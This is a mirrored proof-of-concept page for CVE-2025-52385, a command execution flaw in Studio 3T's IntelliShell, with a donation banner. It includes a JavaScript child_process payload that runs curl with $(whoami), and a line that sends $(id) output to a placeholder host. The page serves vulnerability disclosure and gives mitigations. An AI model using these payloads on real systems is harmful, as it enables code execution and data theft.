Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-52385 PoC — Studio 3T 安全漏洞

Source
Associated Vulnerability
Title:Studio 3T 安全漏洞 (CVE-2025-52385)
Description:Studio 3T是Studio 3T开源的一个原生跨平台MongoDB管理工具。 Studio 3T 2025.1.0及之前版本存在安全漏洞,该漏洞源于child_process模块处理特制payload不当,可能导致任意代码执行。
Description
Studio 3T v.2025.1.0 
Readme
# CVE-2025-52385
**Software**: Studio 3T v.2025.1.0 

**Vulnerability Report**: Studio 3T Remote Command Execution

**Overview**
A critical vulnerability in Studio 3T version 2025.1.0 and earlier allows a remote attacker to execute arbitrary code via a crafted payload exploiting the child_process module in the IntelliShell component.

**Details**
**Vulnerability Type: Remote Command Execution**
Affected Product: Studio 3T, version <= 2025.1.0
Affected Component: IntelliShell
Attack Type: Remote
Impacts:
Code Execution: Yes
Denial of Service: Yes
Escalation of Privileges: Yes

**Description**
The vulnerability enables a remote attacker to execute arbitrary operating system commands by sending a malicious JavaScript payload through IntelliShell, leveraging the child_process module. This is a blind execution vulnerability, meaning no direct output is returned to the attacker.
Attack Vector

Establish a connection to a MongoDB instance.
Send a malicious JavaScript payload via IntelliShell that utilizes the child_process module to execute arbitrary operating system commands.

**Proof of Concept**
To verify the vulnerability, use the following steps:

Set up a local HTTP server:python3 -m http.server 80

Execute the following JavaScript payload in IntelliShell: const {exec} = require('child_process');
exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));


Alternatively, use the command below as a verification vector:curl http://site/$(id)
**References**

Studio 3T Official Website

Studio 3T GitHub Repository

CWE-78: OS Command Injection

CWE-94: Code Injection

**Mitigation**
Users: Upgrade to a patched version of Studio 3T (if available) or avoid using IntelliShell with untrusted MongoDB connections.
Vendors: Restrict or sanitize inputs to the child_process module in IntelliShell to prevent unauthorized command execution.

**Acknowledgments**
This vulnerability was discovered and reported by Kaio Mendonca Pereira.
File Snapshot

[4.0K] /data/pocs/0191fa30c5c9dd627d59103f41bd510e379f8d19 └── [1.9K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.